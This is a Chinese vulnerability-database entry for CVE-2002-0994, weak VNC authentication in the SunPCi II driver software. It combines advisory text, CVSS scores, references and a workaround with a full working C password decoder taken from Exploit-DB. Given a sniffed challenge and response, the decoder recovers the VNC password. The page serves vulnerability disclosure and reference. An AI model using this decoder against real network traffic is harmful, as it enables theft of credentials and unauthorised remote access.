CVE-2002-0994
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:29
NMCOES    

[原文]SunPCi II VNC uses a weak authentication scheme, which allows remote attackers to obtain the VNC password by sniffing the random byte challenge, which is used as the key for encrypted communications.


[CNNVD]Sun SunPCi II VNC软件远程口令泄露漏洞(CNNVD-200210-017)

        
        SunPCi II卡是多种Solaris系统中的协处理器,提供PC软件兼容功能,包括Microsoft Windows,自SunPCi II驱动2.3版本之后,包含一些基于AT&T做过改动的VNC客户端和服务程序等软件,其中之一的修改部分包括VNC客户端和服务器端的验证过程。
        Sun SunPCi II的VNC在新的验证机制中存在漏洞,远程攻击者可以通过嗅探VNC客户端和服务器端的通信获得密码信息。
        由于Sun SunPCi II的VNC使用的新的验证机制在通信中没有进行信息加密,攻击者可以通过嗅探VNC验证过程的通信获得明文密码,在获得密码之后,攻击者可以使用VNC或者其他协议访问系统,默认情况下VNC服务在X中以ROOT权限运行。
        如果VNC客户端和服务器端通信使用其他的安全层加密如SSL,攻击者将不能利用此漏洞进行攻击。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0994
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0994
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-017
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5146
(VENDOR_ADVISORY)  BID  5146
http://www.iss.net/security_center/static/9476.php
(VENDOR_ADVISORY)  XF  sunpci-vnc-weak-authentication(9476)
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0003.html
(UNKNOWN)  VULNWATCH  20020703 SunPCi II VNC weak authentication scheme vulnerability

- 漏洞信息

Sun SunPCi II VNC软件远程口令泄露漏洞
高危 设计错误
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        
        SunPCi II卡是多种Solaris系统中的协处理器,提供PC软件兼容功能,包括Microsoft Windows,自SunPCi II驱动2.3版本之后,包含一些基于AT&T做过改动的VNC客户端和服务程序等软件,其中之一的修改部分包括VNC客户端和服务器端的验证过程。
        Sun SunPCi II的VNC在新的验证机制中存在漏洞,远程攻击者可以通过嗅探VNC客户端和服务器端的通信获得密码信息。
        由于Sun SunPCi II的VNC使用的新的验证机制在通信中没有进行信息加密,攻击者可以通过嗅探VNC验证过程的通信获得明文密码,在获得密码之后,攻击者可以使用VNC或者其他协议访问系统,默认情况下VNC服务在X中以ROOT权限运行。
        如果VNC客户端和服务器端通信使用其他的安全层加密如SSL,攻击者将不能利用此漏洞进行攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用加密通道与服务器通信。
        厂商补丁:
        Sun
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.sun.com/desktop/products/sunpci/

- 漏洞信息 (21592)

Sun SunPCi II VNC Software 2.3 Password Disclosure Vulnerability (EDBID:21592)
unix local
2002-07-03 Verified
0 Richard van den Berg
N/A [点击下载]
source: http://www.securityfocus.com/bid/5146/info


The SunPCi II card is a co-processor for a number of Solaris based systems, and provides PC software compatibility, including the ability to run Microsoft Windows. Driver software is available for the SunPCi card, including a Virtual Network Computing (VNC) client and server.

A weakness in the authentication scheme used by the VNC client and server may result in the disclosure of user passwords. An attacker able to sniff unencrypted network traffic during the VNC authentication process may trivially recover the plaintext password.

Exploitation will not be possible if network traffic is encrypted with an additional secure layer, such as SSL.

Reportedly, the VNC software was first included in version 2.3 of the SunPCi Driver Software. 

/* real quick SunPCi VNC password decoder */

/* tested on Linux and Solaris; no warranties */

/* all code is ripped, therefore I take no credit */



#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <time.h>

#include <sys/types.h>

#include <sys/stat.h>



#define MAXPWLEN 8

#define CHALLENGESIZE 16

#define EN0     0       /* MODE == encrypt */

#define DE1     1       /* MODE == decrypt */



extern int vncEncryptPasswd(char *passwd, char *fname);

extern char *vncDecryptPasswd(char *fname, unsigned char *key);

extern void vncRandomBytes(unsigned char *bytes);

extern void vncEncryptBytes(unsigned char *bytes, const char *passwd);

extern void deskey(unsigned char *, int);

extern void usekey(unsigned long *);

extern void cpkey(unsigned long *);

extern void des(unsigned char *, unsigned char *);





int main (void){



/* put the first 8 bytes of your sniffed challenge here in challenge[] */

unsigned char challenge[] = {0x87,0x5d,0x28,0xf3,0x54,0x2d,0xa9,0xe8};

/* put the first 8 bytes of your sniffed response here in response[] */

char response[]={0x0d, 0xfc, 0xc6, 0xfc, 0x62, 0xc2, 0x18, 0x0e};



printf("%s\n",vncDecryptPasswd(response,challenge));

exit(0);

}





char *

vncDecryptPasswd(char *inouttext, unsigned char *key)

{

    unsigned char *passwd = (unsigned char *)malloc(9);



    deskey(key, DE1);

    des(inouttext, passwd);



    passwd[8] = 0;



    return (char *)passwd;

}





static void scrunch(unsigned char *, unsigned long *);

static void unscrun(unsigned long *, unsigned char *);

static void desfunc(unsigned long *, unsigned long *);

static void cookey(unsigned long *);



static unsigned long KnL[32] = { 0L };

static unsigned long KnR[32] = { 0L };

static unsigned long Kn3[32] = { 0L };

static unsigned char Df_Key[24] = {

	0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,

	0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10,

	0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 };



static unsigned short bytebit[8]	= {

	01, 02, 04, 010, 020, 040, 0100, 0200 };



static unsigned long bigbyte[24] = {

	0x800000L,	0x400000L,	0x200000L,	0x100000L,

	0x80000L,	0x40000L,	0x20000L,	0x10000L,

	0x8000L,	0x4000L,	0x2000L,	0x1000L,

	0x800L, 	0x400L, 	0x200L, 	0x100L,

	0x80L,		0x40L,		0x20L,		0x10L,

	0x8L,		0x4L,		0x2L,		0x1L	};



/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */



static unsigned char pc1[56] = {

	56, 48, 40, 32, 24, 16,  8,	 0, 57, 49, 41, 33, 25, 17,

	 9,  1, 58, 50, 42, 34, 26,	18, 10,  2, 59, 51, 43, 35,

	62, 54, 46, 38, 30, 22, 14,	 6, 61, 53, 45, 37, 29, 21,

	13,  5, 60, 52, 44, 36, 28,	20, 12,  4, 27, 19, 11,  3 };



static unsigned char totrot[16] = {

	1,2,4,6,8,10,12,14,15,17,19,21,23,25,27,28 };



static unsigned char pc2[48] = {

	13, 16, 10, 23,  0,  4,  2, 27, 14,  5, 20,  9,

	22, 18, 11,  3, 25,  7, 15,  6, 26, 19, 12,  1,

	40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47,

	43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31 };



void deskey(key, edf)	/* Thanks to James Gillogly & Phil Karn! */

unsigned char *key;

int edf;

{

	register int i, j, l, m, n;

	unsigned char pc1m[56], pcr[56];

	unsigned long kn[32];



	for ( j = 0; j < 56; j++ ) {

		l = pc1[j];

		m = l & 07;

		pc1m[j] = (key[l >> 3] & bytebit[m]) ? 1 : 0;

		}

	for( i = 0; i < 16; i++ ) {

		if( edf == DE1 ) m = (15 - i) << 1;

		else m = i << 1;

		n = m + 1;

		kn[m] = kn[n] = 0L;

		for( j = 0; j < 28; j++ ) {

			l = j + totrot[i];

			if( l < 28 ) pcr[j] = pc1m[l];

			else pcr[j] = pc1m[l - 28];

			}

		for( j = 28; j < 56; j++ ) {

		    l = j + totrot[i];

		    if( l < 56 ) pcr[j] = pc1m[l];

		    else pcr[j] = pc1m[l - 28];

		    }

		for( j = 0; j < 24; j++ ) {

			if( pcr[pc2[j]] ) kn[m] |= bigbyte[j];

			if( pcr[pc2[j+24]] ) kn[n] |= bigbyte[j];

			}

		}

	cookey(kn);

	return;

	}



static void cookey(raw1)

register unsigned long *raw1;

{

	register unsigned long *cook, *raw0;

	unsigned long dough[32];

	register int i;



	cook = dough;

	for( i = 0; i < 16; i++, raw1++ ) {

		raw0 = raw1++;

		*cook	 = (*raw0 & 0x00fc0000L) << 6;

		*cook	|= (*raw0 & 0x00000fc0L) << 10;

		*cook	|= (*raw1 & 0x00fc0000L) >> 10;

		*cook++ |= (*raw1 & 0x00000fc0L) >> 6;

		*cook	 = (*raw0 & 0x0003f000L) << 12;

		*cook	|= (*raw0 & 0x0000003fL) << 16;

		*cook	|= (*raw1 & 0x0003f000L) >> 4;

		*cook++ |= (*raw1 & 0x0000003fL);

		}

	usekey(dough);

	return;

	}



void cpkey(into)

register unsigned long *into;

{

	register unsigned long *from, *endp;



	from = KnL, endp = &KnL[32];

	while( from < endp ) *into++ = *from++;

	return;

	}



void usekey(from)

register unsigned long *from;

{

	register unsigned long *to, *endp;



	to = KnL, endp = &KnL[32];

	while( to < endp ) *to++ = *from++;

	return;

	}



void des(inblock, outblock)

unsigned char *inblock, *outblock;

{

	unsigned long work[2];



	scrunch(inblock, work);

	desfunc(work, KnL);

	unscrun(work, outblock);

	return;

	}



static void scrunch(outof, into)

register unsigned char *outof;

register unsigned long *into;

{

	*into	 = (*outof++ & 0xffL) << 24;

	*into	|= (*outof++ & 0xffL) << 16;

	*into	|= (*outof++ & 0xffL) << 8;

	*into++ |= (*outof++ & 0xffL);

	*into	 = (*outof++ & 0xffL) << 24;

	*into	|= (*outof++ & 0xffL) << 16;

	*into	|= (*outof++ & 0xffL) << 8;

	*into	|= (*outof   & 0xffL);

	return;

	}



static void unscrun(outof, into)

register unsigned long *outof;

register unsigned char *into;

{

	*into++ = (*outof >> 24) & 0xffL;

	*into++ = (*outof >> 16) & 0xffL;

	*into++ = (*outof >>  8) & 0xffL;

	*into++ =  *outof++	 & 0xffL;

	*into++ = (*outof >> 24) & 0xffL;

	*into++ = (*outof >> 16) & 0xffL;

	*into++ = (*outof >>  8) & 0xffL;

	*into	=  *outof	 & 0xffL;

	return;

	}



static unsigned long SP1[64] = {

	0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L,

	0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L,

	0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L,

	0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L,

	0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L,

	0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L,

	0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L,

	0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L,

	0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L,

	0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L,

	0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L,

	0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L,

	0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L,

	0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L,

	0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L,

	0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L };



static unsigned long SP2[64] = {

	0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L,

	0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L,

	0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L,

	0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L,

	0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L,

	0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L,

	0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L,

	0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L,

	0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L,

	0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L,

	0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L,

	0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L,

	0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L,

	0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L,

	0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L,

	0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L };



static unsigned long SP3[64] = {

	0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L,

	0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L,

	0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L,

	0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L,

	0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L,

	0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L,

	0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L,

	0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L,

	0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L,

	0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L,

	0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L,

	0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L,

	0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L,

	0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L,

	0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L,

	0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L };



static unsigned long SP4[64] = {

	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,

	0x00802080L, 0x00800081L, 0x00800001L, 0x00002001L,

	0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L,

	0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L,

	0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L,

	0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L,

	0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L,

	0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L,

	0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L,

	0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L,

	0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L,

	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,

	0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L,

	0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L,

	0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L,

	0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L };



static unsigned long SP5[64] = {

	0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L,

	0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L,

	0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L,

	0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L,

	0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L,

	0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L,

	0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L,

	0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L,

	0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L,

	0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L,

	0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L,

	0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L,

	0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L,

	0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L,

	0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L,

	0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L };



static unsigned long SP6[64] = {

	0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L,

	0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L,

	0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L,

	0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L,

	0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L,

	0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L,

	0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L,

	0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L,

	0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L,

	0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L,

	0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L,

	0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L,

	0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L,

	0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L,

	0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L,

	0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L };



static unsigned long SP7[64] = {

	0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L,

	0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L,

	0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L,

	0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L,

	0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L,

	0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L,

	0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L,

	0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L,

	0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L,

	0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L,

	0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L,

	0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L,

	0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L,

	0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L,

	0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L,

	0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L };



static unsigned long SP8[64] = {

	0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L,

	0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L,

	0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L,

	0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L,

	0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L,

	0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L,

	0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L,

	0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L,

	0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L,

	0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L,

	0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L,

	0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L,

	0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L,

	0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L,

	0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L,

	0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L };



static void desfunc(block, keys)

register unsigned long *block, *keys;

{

	register unsigned long fval, work, right, leftt;

	register int round;



	leftt = block[0];

	right = block[1];

	work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL;

	right ^= work;

	leftt ^= (work << 4);

	work = ((leftt >> 16) ^ right) & 0x0000ffffL;

	right ^= work;

	leftt ^= (work << 16);

	work = ((right >> 2) ^ leftt) & 0x33333333L;

	leftt ^= work;

	right ^= (work << 2);

	work = ((right >> 8) ^ leftt) & 0x00ff00ffL;

	leftt ^= work;

	right ^= (work << 8);

	right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL;

	work = (leftt ^ right) & 0xaaaaaaaaL;

	leftt ^= work;

	right ^= work;

	leftt = ((leftt << 1) | ((leftt >> 31) & 1L)) & 0xffffffffL;



	for( round = 0; round < 8; round++ ) {

		work  = (right << 28) | (right >> 4);

		work ^= *keys++;

		fval  = SP7[ work		 & 0x3fL];

		fval |= SP5[(work >>  8) & 0x3fL];

		fval |= SP3[(work >> 16) & 0x3fL];

		fval |= SP1[(work >> 24) & 0x3fL];

		work  = right ^ *keys++;

		fval |= SP8[ work		 & 0x3fL];

		fval |= SP6[(work >>  8) & 0x3fL];

		fval |= SP4[(work >> 16) & 0x3fL];

		fval |= SP2[(work >> 24) & 0x3fL];

		leftt ^= fval;

		work  = (leftt << 28) | (leftt >> 4);

		work ^= *keys++;

		fval  = SP7[ work		 & 0x3fL];

		fval |= SP5[(work >>  8) & 0x3fL];

		fval |= SP3[(work >> 16) & 0x3fL];

		fval |= SP1[(work >> 24) & 0x3fL];

		work  = leftt ^ *keys++;

		fval |= SP8[ work		 & 0x3fL];

		fval |= SP6[(work >>  8) & 0x3fL];

		fval |= SP4[(work >> 16) & 0x3fL];

		fval |= SP2[(work >> 24) & 0x3fL];

		right ^= fval;

		}



	right = (right << 31) | (right >> 1);

	work = (leftt ^ right) & 0xaaaaaaaaL;

	leftt ^= work;

	right ^= work;

	leftt = (leftt << 31) | (leftt >> 1);

	work = ((leftt >> 8) ^ right) & 0x00ff00ffL;

	right ^= work;

	leftt ^= (work << 8);

	work = ((leftt >> 2) ^ right) & 0x33333333L;

	right ^= work;

	leftt ^= (work << 2);

	work = ((right >> 16) ^ leftt) & 0x0000ffffL;

	leftt ^= work;

	right ^= (work << 16);

	work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL;

	leftt ^= work;

	right ^= (work << 4);

	*block++ = right;

	*block = leftt;

	return;

	}



		

- 漏洞信息

6279
SunPCi II VNC Cleartext Password Disclosure
Cryptographic, Information Disclosure
Loss of Confidentiality

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-07-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Sun SunPCi II VNC Software Password Disclosure Vulnerability
Design Error 5146
Yes No
2002-07-03 12:00:00 2009-07-11 02:56:00
Discovered by Richard van den Berg <richard@trust-factory.com>.

- 受影响的程序版本

Sun SunPCi II Driver Software 2.3

- 漏洞讨论

The SunPCi II card is a co-processor for a number of Solaris based systems, and provides PC software compatibility, including the ability to run Microsoft Windows. Driver software is available for the SunPCi card, including a Virtual Network Computing (VNC) client and server.

A weakness in the authentication scheme used by the VNC client and server may result in the disclosure of user passwords. An attacker able to sniff unencrypted network traffic during the VNC authentication process may trivially recover the plaintext password.

Exploitation will not be possible if network traffic is encrypted with an additional secure layer, such as SSL.

Reportedly, the VNC software was first included in version 2.3 of the SunPCi Driver Software.

- 漏洞利用

Richard van den Berg &lt;richard@trust-factory.com&gt; has provided a program which will decrypt passwords, given sniffed data:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站